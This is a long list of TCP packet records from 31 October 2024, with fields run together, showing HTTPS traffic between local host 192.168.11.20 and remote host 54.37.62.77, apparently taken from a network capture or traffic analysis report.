                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658632994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658799887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658899069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658920050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.659106016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828752995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828843117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828979015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828979015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829022884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829040051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829040051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829195023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.846904993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.846985102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847121000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847121000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847160101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847181082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847181082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847337961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847841978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847912073 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848155975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848172903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848391056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012516975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012598038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012738943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012738943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012803078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012837887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012837887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012996912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013416052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013475895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013662100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013663054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013717890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013741016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013935089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014075041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014152050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014297009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014297009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014337063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014360905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014416933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014502048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019241095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019311905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019541979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019583941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019757032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020149946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020226002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020370960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020371914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020431042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020450115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020621061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020934105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020992994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021181107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021181107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021229982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021308899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021435976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.022469997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.171777010 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.171858072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172053099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172054052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172054052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172116995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172146082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172403097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197653055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197737932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197923899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197925091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197981119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198004007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198225975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198762894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198843002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198973894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198975086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199035883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199035883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199065924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199227095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199840069 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.199914932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.200100899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.200145960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.200161934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.200409889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201010942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201080084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201179028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201179028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201272964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201272964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201272964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201303959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.201488972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202161074 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202222109 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202343941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202343941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202399969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202426910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202461004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.202569008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203351974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203425884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203505039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203505039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203548908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203573942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203600883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203602076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.203710079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.205869913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.205946922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206090927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206090927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206152916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206187010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206187010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206391096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206824064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206897974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206978083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.206978083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.207112074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.207112074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.207112074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.207170963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.207309961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208024025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208097935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208216906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208273888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208273888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208273888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208311081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208344936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.208542109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209017992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209352016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209436893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209534883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209534883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209575891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209575891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209599972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209625006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.209759951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210347891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210422039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210982084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210982084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210982084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.210982084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.211033106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.211340904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.233696938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.233779907 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.233936071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.233936071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.233985901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.234010935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.234642029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.234642029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.246186018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.342302084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.342319012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.342739105 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.342751026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.343076944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358103991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358182907 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358330965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358330965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358393908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358428001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.358583927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.368727922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.368808031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.368968964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.368968964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.368968964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.369034052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.369065046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.369271994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458091974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458170891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458322048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458322048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458384991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458406925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.458565950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459148884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459222078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459373951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459496021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459573984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.459777117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460246086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460318089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460416079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460416079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460462093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460489035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460508108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460508108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.460634947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.461466074 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.461534977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.461738110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.461775064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.461921930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.462971926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463040113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463238955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463258982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463258982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463433981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463984966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464052916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464169025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464169025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464231014 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464354992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464431047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465049982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465117931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465231895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465231895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465296030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465296030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465327024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465399027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465500116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465996027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466052055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466175079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466227055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466227055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466252089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466273069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466394901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471807957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471862078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471991062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471991062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472178936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472230911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472471952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472954988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473007917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473170996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473170996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473310947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473366976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473561049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474045992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474098921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474232912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474234104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474282980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474394083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474438906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475199938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475254059 CET4434975554.37.62.77192.168.11.20
